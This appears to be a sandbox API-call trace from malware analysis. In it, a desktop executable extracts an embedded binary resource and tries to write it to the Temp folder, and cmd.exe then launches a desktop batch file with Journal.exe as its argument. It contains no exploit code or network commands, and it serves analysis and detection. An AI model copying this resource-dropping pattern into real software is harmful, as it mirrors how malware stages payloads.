!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿß\x80\x97:äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0187.132] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x80) returned 0x6191e0 [0187.664] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0187.664] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0187.665] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x6191e0) returned 0x80 [0187.665] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0187.666] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0187.666] GetCurrentProcess () returned 0xffffffff [0187.666] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0187.666] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0187.666] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0187.669] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0187.669] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0187.669] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0187.669] LockResource (hResData=0x43c648) returned 0x43c648 [0187.669] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x18) returned 0x6196b0 [0187.671] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.829] GetLastError () returned 0x20 [0187.829] GetLastError () returned 0x20 [0187.829] SetLastError (dwErrCode=0x20) [0187.829] GetLastError () returned 0x20 [0187.829] SetLastError (dwErrCode=0x20) [0187.830] GetLastError () returned 0x20 [0187.830] SetLastError (dwErrCode=0x20) [0187.830] GetLastError () returned 0x20 [0187.831] SetLastError (dwErrCode=0x20) [0187.831] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x1000) returned 0x6196d0 [0187.831] GetLastError () returned 0x20 [0187.832] SetLastError (dwErrCode=0x20) [0187.832] GetLastError () returned 0x20 [0187.832] SetLastError (dwErrCode=0x20) [0187.832] GetLastError () returned 0x20 [0187.832] SetLastError (dwErrCode=0x20) [0187.832] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e38c | out: lpMode=0x18e38c) returned 1 [0187.832] WriteFile (in: hFile=0x7, lpBuffer=0x18ea68*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e394, lpOverlapped=0x0 | out: lpBuffer=0x18ea68*, lpNumberOfBytesWritten=0x18e394*=0x49, lpOverlapped=0x0) returned 1 [0188.705] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6187b0 | out: hHeap=0x600000) returned 1 [0188.706] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0188.706] ExitProcess (uExitCode=0x1) [0188.707] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x617088 | out: hHeap=0x600000) returned 1 Process: id = "179" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2f235000" os_pid = "0x74c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa7c" cmd_line = "cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Journal.exe\"\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 711 os_tid = 0x99c [0195.165] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fda4 | out: lpSystemTimeAsFileTime=0x28fda4*(dwLowDateTime=0x2d669e00, dwHighDateTime=0x1d68287)) [0195.165] GetCurrentProcessId () returned 0x74c [0195.166] GetCurrentThreadId () returned 0x99c [0195.166] GetTickCount () returned 0x115d356 [0195.166] QueryPerformanceCounter (in: lpPerformanceCount=0x28fd9c | out: lpPerformanceCount=0x28fd9c*=31550463326) returned 1 [0195.176] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0195.176] __set_app_type (_Type=0x1) [0195.176] __p__fmode () returned 0x770331f4 [0195.176] __p__commode () returned 0x770331fc [0195.176] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0195.177] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0195.177] GetCurrentThreadId () returned 0x99c [0195.177] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x99c) returned 0x60 [0195.177] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0195.178] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0195.178] SetThreadUILanguage (LangId=0x0) returned 0x409 [0195.178] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0195.178] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fd34 | out: phkResult=0x28fd34*=0x0) returned 0x2 [0195.178] VirtualQuery (in: lpAddress=0x28fd6b, lpBuffer=0x28fd04, dwLength=0x1c | out: lpBuffer=0x28fd04*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0195.178] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28fd04, dwLength=0x1c | out: lpBuffer=0x28fd04*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0195.178] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28fd04, dwLength=0x1c | out: lpBuffer=0x28fd04*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0195.178] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28fd04, dwLength=0x1c | out: lpBuffer=0x28fd04*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0195.179] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28fd04, dwLength=0x1c | out: lpBuffer=0x28fd04*(BaseAddress=0x290000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x120000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0195.179] GetConsoleOutputCP () returned 0x1b5 [0195.179] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0195.179] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0195.179] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.179] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0195.179] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.180] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0195.180] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.180] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0195.180] _get_osfhandle (_FileHandle=0) returned 0x3 [0195.180] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0195.181] _get_osfhandle (_FileHandle=0) returned 0x3 [0195.181] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0195.181] GetEnvironmentStringsW () returned 0x5620e0* [0195.182] GetProcessHeap () returned 0x550000 [0195.182] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xaca) returned 0x562bb8 [0195.182] FreeEnvironmentStringsW (penv=0x5620e0) returned 1 [0195.182] GetProcessHeap () returned 0x550000 [0195.182] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x4) returned 0x561880 [0195.182] GetEnvironmentStringsW () returned 0x5620e0* [0195.182] GetProcessHeap () returned 0x550000 [0195.183] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xaca) returned 0x563690 [0195.183] FreeEnvironmentStringsW (penv=0x5620e0) returned 1 [0195.183] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28eca4 | out: phkResult=0x28eca4*=0x68) returned 0x0 [0195.183] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ecac, lpData=0x28ecb0, lpcbData=0x28eca8*=0x1000 | out: lpType=0x28ecac*=0x0, lpData=0x28ecb0*=0x0, lpcbData=0x28eca8*=0x1000) returned 0x2 [0195.183] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ecac, lpData=0x28ecb0, lpcbData=0x28eca8*=0x1000 | out: lpType=0x28ecac*=0x4, lpData=0x28ecb0*=0x1, lpcbData=0x28eca8*=0x4) returned 0x0 [0195.183] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ecac, lpData=0x28ecb0, lpcbData=0x28eca8*=0x1000 | out: lpType=0x28ecac*=0x0, lpData=0x28ecb0*=0x1, lpcbData=0x28eca8*=0x1000) returned 0x2 [0195.183] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ecac, lpData=0x28ecb0, lpcbData=0x28eca8*=0x1000 | out: lpType=0x28ecac*=0x4, lpData=0x28ecb0*=0x0, lpcbData=0x28eca8*=0x4) returned 0x0 [0195.184] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ecac, lpData=0x28ecb0, lpcbData=0x28eca8*=0x1000 | out: lpType=0x28ecac*=0x4, lpData=0x28ecb0*=0x40, lpcbData=0x28eca8*=0x4) returned 0x0 [0195.184] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ecac, lpData=0x28ecb0, lpcbData=0x28eca8*=0x1000 | out: lpType=0x28ecac*=0x4, lpData=0x28ecb0*=0x40, lpcbData=0x28eca8*=0x4) returned 0x0 [0195.184] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ecac, lpData=0x28ecb0, lpcbData=0x28eca8*=0x1000 | out: lpType=0x28ecac*=0x0, lpData=0x28ecb0*=0x40, lpcbData=0x28eca8*=0x1000) returned 0x2 [0195.184] RegCloseKey (hKey=0x68) returned 0x0 [0195.184] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28eca4 | out: phkResult=0x28eca4*=0x68) returned 0x0 [0195.184] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ecac, lpData=0x28ecb0, lpcbData=0x28eca8*=0x1000 | out: lpType=0x28ecac*=0x0, lpData=0x28ecb0*=0x40, lpcbData=0x28eca8*=0x1000) returned 0x2 [0195.184] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ecac, lpData=0x28ecb0, lpcbData=0x28eca8*=0x1000 | out: lpType=0x28ecac*=0x4, lpData=0x28ecb0*=0x1, lpcbData=0x28eca8*=0x4) returned 0x0 [0195.184] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ecac, lpData=0x28ecb0, lpcbData=0x28eca8*=0x1000 | out: lpType=0x28ecac*=0x0, lpData=0x28ecb0*=0x1, lpcbData=0x28eca8*=0x1000) returned 0x2 [0195.184] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ecac, lpData=0x28ecb0, lpcbData=0x28eca8*=0x1000 | out: lpType=0x28ecac*=0x4, lpData=0x28ecb0*=0x0, lpcbData=0x28eca8*=0x4) returned 0x0 [0195.184] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ecac, lpData=0x28ecb0, lpcbData=0x28eca8*=0x1000 | out: lpType=0x28ecac*=0x4, lpData=0x28ecb0*=0x9, lpcbData=0x28eca8*=0x4) returned 0x0 [0195.184] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ecac, lpData=0x28ecb0, lpcbData=0x28eca8*=0x1000 | out: lpType=0x28ecac*=0x4, lpData=0x28ecb0*=0x9, lpcbData=0x28eca8*=0x4) returned 0x0 [0195.185] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ecac, lpData=0x28ecb0, lpcbData=0x28eca8*=0x1000 | out: lpType=0x28ecac*=0x0, lpData=0x28ecb0*=0x9, lpcbData=0x28eca8*=0x1000) returned 0x2 [0195.185] RegCloseKey (hKey=0x68) returned 0x0 [0195.185] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2de [0195.185] srand (_Seed=0x5f51e2de) [0195.185] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Journal.exe\"\"" [0195.263] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Journal.exe\"\"" [0195.264] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0195.265] GetProcessHeap () returned 0x550000 [0195.265] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x210) returned 0x5620e0 [0195.265] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5620e8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0195.265] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0195.265] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0195.265] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0195.265] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0195.265] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0195.265] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0195.265] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0195.265] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0195.265] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0195.266] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0195.266] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0195.266] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0195.266] GetProcessHeap () returned 0x550000 [0195.266] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x562bb8 | out: hHeap=0x550000) returned 1 [0195.266] GetEnvironmentStringsW () returned 0x5622f8* [0195.266] GetProcessHeap () returned 0x550000 [0195.266] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xae2) returned 0x564c58 [0195.266] FreeEnvironmentStringsW (penv=0x5622f8) returned 1 [0195.266] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.266] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0195.266] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0195.266] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0195.267] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0195.267] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0195.267] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0195.267] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0195.267] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0195.267] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0195.267] GetProcessHeap () returned 0x550000 [0195.267] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x54) returned 0x5617b0 [0195.267] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28fa70 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0195.267] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x28fa70, lpFilePart=0x28fa6c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x28fa6c*="Desktop") returned 0x25 [0195.267] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0195.267] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f7ec | out: lpFindFileData=0x28f7ec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x565748 [0195.267] FindClose (in: hFindFile=0x565748 | out: hFindFile=0x565748) returned 1 [0195.267] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x28f7ec | out: lpFindFileData=0x28f7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x565748 [0195.268] FindClose (in: hFindFile=0x565748 | out: hFindFile=0x565748) returned 1 [0195.268] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0195.268] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x28f7ec | out: lpFindFileData=0x28f7ec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x565748 [0195.268] FindClose (in: hFindFile=0x565748 | out: hFindFile=0x565748) returned 1 [0195.268] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0195.268] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0195.268] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0195.268] GetProcessHeap () returned 0x550000 [0195.268] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564c58 | out: hHeap=0x550000) returned 1 [0195.268] GetEnvironmentStringsW () returned 0x564168* [0195.268] GetProcessHeap () returned 0x550000 [0195.268] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xb36) returned 0x565f88 [0195.269] FreeEnvironmentStringsW (penv=0x564168) returned 1 [0195.269] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0195.269] GetProcessHeap () returned 0x550000 [0195.269] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5617b0 | out: hHeap=0x550000) returned 1 [0195.269] GetProcessHeap () returned 0x550000 [0195.269] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x400e) returned 0x566ac8 [0195.269] GetProcessHeap () returned 0x550000 [0195.269] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xd8) returned 0x562e38 [0195.269] GetProcessHeap () returned 0x550000 [0195.269] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x4008) returned 0x56aae0 [0195.270] GetProcessHeap () returned 0x550000 [0195.270] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x4008) returned 0x56eaf0 [0195.270] GetProcessHeap () returned 0x550000 [0195.270] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566ac8 | out: hHeap=0x550000) returned 1 [0195.270] GetConsoleOutputCP () returned 0x1b5 [0195.872] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0195.872] GetUserDefaultLCID () returned 0x409 [0195.873] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0195.873] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28fbb0, cchData=128 | out: lpLCData="0") returned 2 [0195.873] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28fbb0, cchData=128 | out: lpLCData="0") returned 2 [0195.873] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28fbb0, cchData=128 | out: lpLCData="1") returned 2 [0195.873] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0195.873] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0195.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0195.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0195.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0195.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0195.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0195.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0195.874] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0195.874] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0195.874] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0195.875] GetProcessHeap () returned 0x550000 [0195.875] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20c) returned 0x562f18 [0195.875] GetConsoleTitleW (in: lpConsoleTitle=0x562f18, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.876] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0195.876] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0195.876] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0195.876] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0195.878] GetProcessHeap () returned 0x550000 [0195.878] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x400a) returned 0x566ac8 [0195.878] GetProcessHeap () returned 0x550000 